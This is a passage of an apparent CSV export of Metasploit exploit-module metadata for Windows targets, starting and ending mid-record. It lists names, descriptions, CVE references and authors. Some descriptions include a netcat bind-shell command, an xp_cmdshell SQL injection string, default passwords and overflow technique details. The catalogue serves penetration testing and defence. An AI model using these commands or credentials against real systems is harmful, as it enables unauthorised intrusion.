By sending an overly long string to the Alert Service, a buffer is overwritten and arbitrary code can be executed.","Metasploit Framework License (BSD)","t","2007-04-13 00:00:00",0,,"aggressive","t","CVE-2007-1674, OSVDB-34964, URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html","MC " 973,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/mercury_phonebook.rb","exploit","windows/misc/mercury_phonebook","exploit/windows/misc/mercury_phonebook","Mercury/32 <= v4.01b PH Server Module Buffer Overflow",200,"This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.","Metasploit Framework License (BSD)","t","2005-12-19 00:00:00",0,,"aggressive","t","BID-16396, CVE-2005-4411, OSVDB-22103","MC " 974,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/mini_stream.rb","exploit","windows/misc/mini_stream","exploit/windows/misc/mini_stream","Mini-Stream 3.0.1.1 Buffer Overflow",300,"This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1. By creating a specially crafted pls file, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-12-25 00:00:00",0,,"passive","t","CVE-2009-5109, EDB-10745, OSVDB-61341","CORELAN Security Team, Ron Henry " 975,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/mirc_privmsg_server.rb","exploit","windows/misc/mirc_privmsg_server","exploit/windows/misc/mirc_privmsg_server","mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow",300,"This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. 
This module is based on the code by SkD.","Metasploit Framework License (BSD)","f","2008-10-02 00:00:00",0,,"passive","t","BID-31552, CVE-2008-4449, EDB-6666, OSVDB-48752","patrick " 976,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ms07_064_sami.rb","exploit","windows/misc/ms07_064_sami","exploit/windows/misc/ms07_064_sami","Microsoft DirectX DirectShow SAMI Buffer Overflow",300,"This module exploits a stack buffer overflow in the DirectShow Synchronized Accessible Media Interchange (SAMI) parser in quartz.dll. This module has only been tested with Windows Media Player (6.4.09.1129) and DirectX 8.0.","Metasploit Framework License (BSD)","f","2007-12-11 00:00:00",0,,"passive","t","BID-26789, CVE-2007-3901, MSB-MS07-064, OSVDB-39126","MC " 977,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ms10_104_sharepoint.rb","exploit","windows/misc/ms10_104_sharepoint","exploit/windows/misc/ms10_104_sharepoint","Microsoft Office SharePoint Server 2007 Remote Code Execution",600,"This module exploits a vulnerability found in SharePoint Server 2007 SP2. The software contains a directory traversal that allows a remote attacker to write arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile request to the Office Document Conversions Launcher Service, which results in code execution under the context of 'SYSTEM'. The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers. 
It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2010-12-14 00:00:00",0,,"aggressive","t","BID-45264, CVE-2010-3964, MSB-MS10-104, OSVDB-69817, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-287/","James Burton, Oleksandr Mirosh, juan vazquez " 978,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/netcat110_nt.rb","exploit","windows/misc/netcat110_nt","exploit/windows/misc/netcat110_nt","Netcat v1.10 NT Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending an overly long string we are able to overwrite SEH. The vulnerability exists when netcat is used to bind (-e) an executable to a port in doexec.c. This module tested successfully using ""c:\>nc -L -p 31337 -e ftp"".","Metasploit Framework License (BSD)","f","2004-12-27 00:00:00",0,,"aggressive","t","BID-12106, CVE-2004-1317, EDB-726, OSVDB-12612","patrick " 979,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/nettransport.rb","exploit","windows/misc/nettransport","exploit/windows/misc/nettransport","NetTransport Download Manager 2.90.510 Buffer Overflow",300,"This module exploits a stack buffer overflow in NetTransport Download Manager, part of the NetXfer suite. This module was tested successfully against version 2.90.510.","Metasploit Framework License (BSD)","f","2010-01-02 00:00:00",0,,"aggressive","t","EDB-10911, OSVDB-61435","Lincoln, dookie" 980,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/poisonivy_bof.rb","exploit","windows/misc/poisonivy_bof","exploit/windows/misc/poisonivy_bof","Poison Ivy 2.3.2 C&C Server Buffer Overflow",300,"This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. 
If the C&C is configured with the default 'admin' password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The 'check' command can be used to determine if the C&C target is using the default 'admin' password. Hopefully an exploit attempt won't crash the Poison Ivy C&C process, just the thread responsible for handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or once a session is obtained.","Metasploit Framework License (BSD)","f","2012-06-24 00:00:00",0,,"aggressive","t","URL-http://badishi.com/own-and-you-shall-be-owned, URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf","Andrzej Dereszowski, Gal Badishi, juan vazquez " 981,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/poppeeper_date.rb","exploit","windows/misc/poppeeper_date","exploit/windows/misc/poppeeper_date","POP Peeper v3.4 DATE Buffer Overflow",300,"This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted DATE string is sent to a client, an attacker may be able to execute arbitrary code. This module is based on the krakowlabs code.","Metasploit Framework License (BSD)","f","2009-02-27 00:00:00",0,,"passive","t","BID-34093, CVE-2009-1029, OSVDB-53560, URL-http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_date-bof.txt","MC " 982,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/poppeeper_uidl.rb","exploit","windows/misc/poppeeper_uidl","exploit/windows/misc/poppeeper_uidl","POP Peeper v3.4 UIDL Buffer Overflow",300,"This module exploits a stack buffer overflow in POP Peeper v3.4. 
When a specially crafted UIDL string is sent to a client, an attacker may be able to execute arbitrary code. This module is based on the krakowlabs code.","Metasploit Framework License (BSD)","f","2009-02-27 00:00:00",0,,"passive","t","BID-33926, CVE-2009-1029, OSVDB-53559, URL-http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt","MC " 983,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/pxexploit.rb","exploit","windows/misc/pxexploit","exploit/windows/misc/pxexploit","PXE Exploit Server",600,"This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive, placing the payload on the hard drive of any Windows partition seen. Note: the displayed IP address of a target is the address this DHCP server handed out, not the ""normal"" IP address the host uses.","Metasploit Framework License (BSD)","t","2011-08-05 00:00:00",0,,"passive","t",,"scriptjunkie" 984,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/realtek_playlist.rb","exploit","windows/misc/realtek_playlist","exploit/windows/misc/realtek_playlist","Realtek Media Player Playlist Buffer Overflow",500,"This module exploits a stack buffer overflow in Realtek Media Player (RtlRack) A4.06. When a Realtek Media Player client opens a specially crafted playlist, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-12-16 00:00:00",0,,"passive","t","BID-32860, CVE-2008-5664, OSVDB-50715","MC " 985,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/sap_2005_license.rb","exploit","windows/misc/sap_2005_license","exploit/windows/misc/sap_2005_license","SAP Business One License Manager 2005 Buffer Overflow",500,"This module exploits a stack buffer overflow in the SAP Business One 2005 License Manager 'NT Naming Service' A and B releases. 
By sending an excessively long string, the stack is overwritten, enabling arbitrary code execution.","Metasploit Framework License (BSD)","t","2009-08-01 00:00:00",0,,"aggressive","t","BID-35933, CVE-2009-4988, EDB-9319, OSVDB-56837","Jacopo Cervini" 986,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb","exploit","windows/misc/sap_netweaver_dispatcher","exploit/windows/misc/sap_netweaver_dispatcher","SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",300,"This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher service. The overflow occurs in the DiagTraceR3Info() function and allows a remote attacker to execute arbitrary code by supplying a specially crafted Diag packet. The Dispatcher service is only vulnerable if the Developer Traces have been configured at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2 SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2012-05-08 00:00:00",1,,"aggressive","t","BID-53424, CVE-2012-2611, EDB-20705, OSVDB-81759, URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol, URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities","Martin Gallo, juan vazquez " 987,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/shixxnote_font.rb","exploit","windows/misc/shixxnote_font","exploit/windows/misc/shixxnote_font","ShixxNOTE 6.net Font Field Overflow",500,"This module exploits a buffer overflow in ShixxNOTE 6.net. 
The vulnerability is caused by boundary errors in the handling of font fields.","Metasploit Framework License (BSD)","f","2004-10-04 00:00:00",0,,"aggressive","t","BID-11409, CVE-2004-1595, OSVDB-10721","MC " 988,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/splayer_content_type.rb","exploit","windows/misc/splayer_content_type","exploit/windows/misc/splayer_content_type","SPlayer 3.7 Content-Type Buffer Overflow",300,"This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer requests the URL of a media file (video or audio), it is possible to gain arbitrary remote code execution due to a buffer overflow caused by an excessively long 'Content-Type' parameter.","Metasploit Framework License (BSD)","f","2011-05-04 00:00:00",0,,"passive","t","EDB-17243, OSVDB-72181","sinn3r , xsploitedsec " 989,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/stream_down_bof.rb","exploit","windows/misc/stream_down_bof","exploit/windows/misc/stream_down_bof","CoCSoft StreamDown 6.8.0 Buffer Overflow",400,"Stream Down 6.8.0 SEH-based buffer overflow, triggered when processing the server response packet. During the overflow a structured exception handler is overwritten.","Metasploit Framework License (BSD)","f","2011-12-27 00:00:00",0,,"passive","t","BID-51190, CVE-2011-5052, EDB-18283, OSVDB-78043, URL-http://secunia.com/advisories/47343/, URL-http://www.dark-masters.tk/","Fady Mohamed Osman " 990,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/talkative_response.rb","exploit","windows/misc/talkative_response","exploit/windows/misc/talkative_response","Talkative IRC v0.4.4.16 Response Buffer Overflow",300,"This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16. 
When a specially crafted response string is sent to a client, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-17 00:00:00",0,,"passive","t","BID-34141, EDB-8227, OSVDB-64582","MC " 991,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/tiny_identd_overflow.rb","exploit","windows/misc/tiny_identd_overflow","exploit/windows/misc/tiny_identd_overflow","TinyIdentD 2.2 Stack Buffer Overflow",200,"This module exploits a stack-based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.","Metasploit Framework License (BSD)","f","2007-05-14 00:00:00",,,"aggressive","t","BID-23981, CVE-2007-2711, OSVDB-36053","Jacopo Cervini " 992,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb","exploit","windows/misc/trendmicro_cmdprocessor_addtask","exploit/windows/misc/trendmicro_cmdprocessor_addtask","TrendMicro Control Manager <= v5.5 CmdProcessor.exe Stack Buffer Overflow",400,"This module exploits a vulnerability in the CmdProcessor.exe component of Trend Micro Control Manager up to version 5.5. The specific flaw exists within the CmdProcessor.exe service running on TCP port 20101. The vulnerable function is the CGenericScheduler::AddTask function of cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet, controlled data is copied into a 256-byte stack buffer. 
This can be exploited to execute remote code under the context of the user.","Metasploit Framework License (BSD)","f","2011-12-07 00:00:00",0,,"aggressive","t","CVE-2011-5001, OSVDB-77585, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-345/","Blue, Luigi Auriemma" 993,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/ufo_ai.rb","exploit","windows/misc/ufo_ai","exploit/windows/misc/ufo_ai","UFO: Alien Invasion IRC Client Buffer Overflow",200,"This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1.","Metasploit Framework License (BSD)","f","2009-10-28 00:00:00",0,,"passive","t","EDB-14013, OSVDB-65689","Jason Geffner, dookie" 994,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/windows_rsh.rb","exploit","windows/misc/windows_rsh","exploit/windows/misc/windows_rsh","Windows RSH daemon Buffer Overflow",200,"This module exploits a vulnerability in Windows RSH daemon 1.8. The vulnerability is due to a failure to check for the length of input sent to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit to be successful.","Metasploit Framework License (BSD)","t","2007-07-24 00:00:00",0,,"aggressive","t","BID-25044, CVE-2007-4006, OSVDB-38572","MC " 995,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/wireshark_lua.rb","exploit","windows/misc/wireshark_lua","exploit/windows/misc/wireshark_lua","Wireshark console.lua Pre-Loading Script Execution",600,"This module exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there's a 'console.lua' file in the same directory, and then parse/execute the script if found. 
Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8","Metasploit Framework License (BSD)","f","2011-07-18 00:00:00",0,,"passive","t","CVE-2011-3360, OSVDB-75347, URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136","Haifei Li, sinn3r " 996,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/wireshark_packet_dect.rb","exploit","windows/misc/wireshark_packet_dect","exploit/windows/misc/wireshark_packet_dect","Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)",400,"This module exploits a stack buffer overflow in Wireshark <= 1.4.4 by sending a malicious packet.","Metasploit Framework License (BSD)","f","2011-04-18 00:00:00",0,,"aggressive","t","CVE-2011-1591, EDB-17185, OSVDB-71848, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836, URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838","Paul Makowski, corelanc0d3r , sickness" 997,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb","exploit","windows/mmsp/ms10_025_wmss_connect_funnel","exploit/windows/mmsp/ms10_025_wmss_connect_funnel","Windows Media Services ConnectFunnel Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in the Windows Media Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially crafted FunnelConnect request, an attacker can execute arbitrary code under the ""NetShowServices"" user account. Windows Media Services 4.1 ships with Windows 2000 Server, but is not installed by default. NOTE: This service does NOT restart automatically. 
Successful as well as unsuccessful exploitation attempts will kill the service, which prevents additional attempts.","Metasploit Framework License (BSD)","f","2010-04-13 00:00:00",0,,"aggressive","t","CVE-2010-0478, MSB-MS10-025, OSVDB-63726, URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt","jduck " 998,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/motorola/timbuktu_fileupload.rb","exploit","windows/motorola/timbuktu_fileupload","exploit/windows/motorola/timbuktu_fileupload","Timbuktu Pro Directory Traversal/File Upload",600,"This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5.","Metasploit Framework License (BSD)","t","2008-05-10 00:00:00",0,,"aggressive","t","CVE-2008-1117, OSVDB-43544","MC " 999,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb","exploit","windows/mssql/lyris_listmanager_weak_pass","exploit/windows/mssql/lyris_listmanager_weak_pass","Lyris ListManager MSDE Weak sa Password",600,"This module exploits a weak password vulnerability in the Lyris ListManager MSDE install. During installation, the 'sa' account password is set to 'lminstall'. Once the install completes, it is set to 'lyris' followed by the process ID of the installer. This module brute forces all possible process IDs that would be used by the installer.","Metasploit Framework License (BSD)","f","2005-12-08 00:00:00",0,,"aggressive","t","CVE-2005-4145, OSVDB-21559","hdm " 1000,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms02_039_slammer.rb","exploit","windows/mssql/ms02_039_slammer","exploit/windows/mssql/ms02_039_slammer","Microsoft SQL Server Resolution Overflow",400,"This is an exploit for the SQL Server 2000 resolution service buffer overflow. 
This overflow is triggered by sending a UDP packet to port 1434 which starts with 0x04 and is followed by a long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).","Metasploit Framework License (BSD)","t","2002-07-24 00:00:00",0,,"aggressive","t","BID-5310, CVE-2002-0649, MSB-MS02-039, OSVDB-4578","hdm " 1001,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms02_056_hello.rb","exploit","windows/mssql/ms02_056_hello","exploit/windows/mssql/ms02_056_hello","Microsoft SQL Server Hello Overflow",400,"By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3).","Metasploit Framework License (BSD)","t","2002-08-05 00:00:00",0,,"aggressive","t","BID-5411, CVE-2002-1123, MSB-MS02-056, OSVDB-10132","MC " 1002,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb","exploit","windows/mssql/ms09_004_sp_replwritetovarbin","exploit/windows/mssql/ms09_004_sp_replwritetovarbin","Microsoft SQL Server sp_replwritetovarbin Memory Corruption",400,"A heap-based buffer overflow can occur when calling the undocumented ""sp_replwritetovarbin"" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. An authenticated database session is required to access the vulnerable code. That said, it is possible to access the vulnerable code via an SQL injection vulnerability. This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 2. 
pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a ""jmp esp"". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.","Metasploit Framework License (BSD)","t","2008-12-09 00:00:00",0,,"aggressive","t","BID-32710, CVE-2008-5416, EDB-7501, MSB-MS09-004, OSVDB-50589","jduck " 1003,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb","exploit","windows/mssql/ms09_004_sp_replwritetovarbin_sqli","exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli","Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",600,"A heap-based buffer overflow can occur when calling the undocumented ""sp_replwritetovarbin"" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. 
Microsoft patched this vulnerability in SP3 for 2005 without any public mention. This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a ""jmp esp"". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. 
Otherwise, it's a goner.","Metasploit Framework License (BSD)","t","2008-12-09 00:00:00",0,,"aggressive","t","BID-32710, CVE-2008-5416, EDB-7501, MSB-MS09-004, OSVDB-50589, URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/","Rodrigo Marcos, jduck " 1004,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/mssql_linkcrawler.rb","exploit","windows/mssql/mssql_linkcrawler","exploit/windows/mssql/mssql_linkcrawler","Microsoft SQL Server Database Link Crawling Command Execution",500,"This module can be used to crawl MS SQL Server database links and deploy Metasploit payloads through links configured with sysadmin privileges using a valid SQL Server Login. If you are attempting to obtain multiple reverse shells using this module we recommend setting the ""DisablePayloadHandler"" advanced option to ""true"", and setting up a multi/handler to run in the background as a job to support multiple incoming shells. If you are interested in deploying payloads to specific servers this module also supports that functionality via the ""DEPLOYLIST"" option. Currently, the module is capable of delivering payloads to both 32bit and 64bit Windows systems via powershell memory injection methods based on Matthew Graeber's work. As a result, the target server must have powershell installed. 
By default, all of the crawl information is saved to a CSV formatted log file and MSF loot so that the tool can also be used for auditing without deploying payloads.","Metasploit Framework License (BSD)","f","2000-01-01 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx, URL-http://www.exploit-monday.com/2011_10_16_archive.html, URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012","Antti Rantasaari , Scott Sutherland ""nullbind"" " 1005,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/mssql_payload.rb","exploit","windows/mssql/mssql_payload","exploit/windows/mssql/mssql_payload","Microsoft SQL Server Payload Execution",600,"This module executes an arbitrary payload on a Microsoft SQL Server by using the ""xp_cmdshell"" stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wscript.exe' to generate the executable on the target. Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. 
NOTE: This module will leave a payload executable on the target system when the attack is finished.","Metasploit Framework License (BSD)","f","2000-05-30 00:00:00",0,,"aggressive","t","BID-1281, BID-4797, CVE-2000-0402, CVE-2000-1209, OSVDB-15757, OSVDB-557","David Kennedy ""ReL1K"" , jduck " 1006,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mssql/mssql_payload_sqli.rb","exploit","windows/mssql/mssql_payload_sqli","exploit/windows/mssql/mssql_payload_sqli","Microsoft SQL Server Payload Execution via SQL Injection",600,"This module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens. For example, given the following injection: http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical you would need to set the following path: set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar In regard to the payload, unless there is a closed port in the web server, you don't want to use any ""bind"" payload, especially on port 80, as you will stop reaching the vulnerable web server host. You want a ""reverse"" payload, probably to your port 80 or to any other outbound port allowed on the firewall. For privileged ports execute Metasploit msfconsole as root. Currently, three delivery methods are supported. First, the original method uses Windows 'debug.com'. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses 'wscript.exe' to generate the executable on the target. 
Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.","Metasploit Framework License (BSD)","f","2000-05-30 00:00:00",0,,"aggressive","t","BID-1281, BID-4797, CVE-2000-0402, CVE-2000-1209, OSVDB-15757, OSVDB-557, URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/","David Kennedy ""ReL1K"" , Rodrigo Marcos, jduck " 1007,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/mysql_mof.rb","exploit","windows/mysql/mysql_mof","exploit/windows/mysql/mysql_mof","Oracle MySQL for Microsoft Windows MOF Execution",600,"This module takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers (due to the use of a .mof file). This may result in arbitrary code execution under the context of SYSTEM. However, please note in order to use this module, you must have a valid MySQL account on the target machine.","Metasploit Framework License (BSD)","f","2012-12-01 00:00:00",0,,"aggressive","t","CVE-2012-5613, EDB-23083, OSVDB-88118, URL-http://seclists.org/fulldisclosure/2012/Dec/13","kingcope, sinn3r " 1008,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/mysql_payload.rb","exploit","windows/mysql/mysql_payload","exploit/windows/mysql/mysql_payload","Oracle MySQL for Microsoft Windows Payload Execution",600,"This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions are not enforced, and the MySQL service runs as LocalSystem. 
NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.","Metasploit Framework License (BSD)","f","2009-01-16 00:00:00",0,,"aggressive","t","URL-http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html, URL-http://dev.mysql.com/tech-resources/articles/securing_mysql_windows.html","Bernardo Damele A. G. , todb " 1009,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/mysql_yassl_hello.rb","exploit","windows/mysql/mysql_yassl_hello","exploit/windows/mysql/mysql_yassl_hello","MySQL yaSSL SSL Hello Message Buffer Overflow",200,"This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-01-04 00:00:00",0,,"aggressive","t","BID-27140, CVE-2008-0226, OSVDB-41195","MC " 1010,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb","exploit","windows/mysql/scrutinizer_upload_exec","exploit/windows/mysql/scrutinizer_upload_exec","Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",600,"This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer. By default, the software installs a default password in MySQL, and binds the service to ""0.0.0.0"". This allows any remote user to login to MySQL, and then gain arbitrary remote code execution under the context of 'SYSTEM'. 
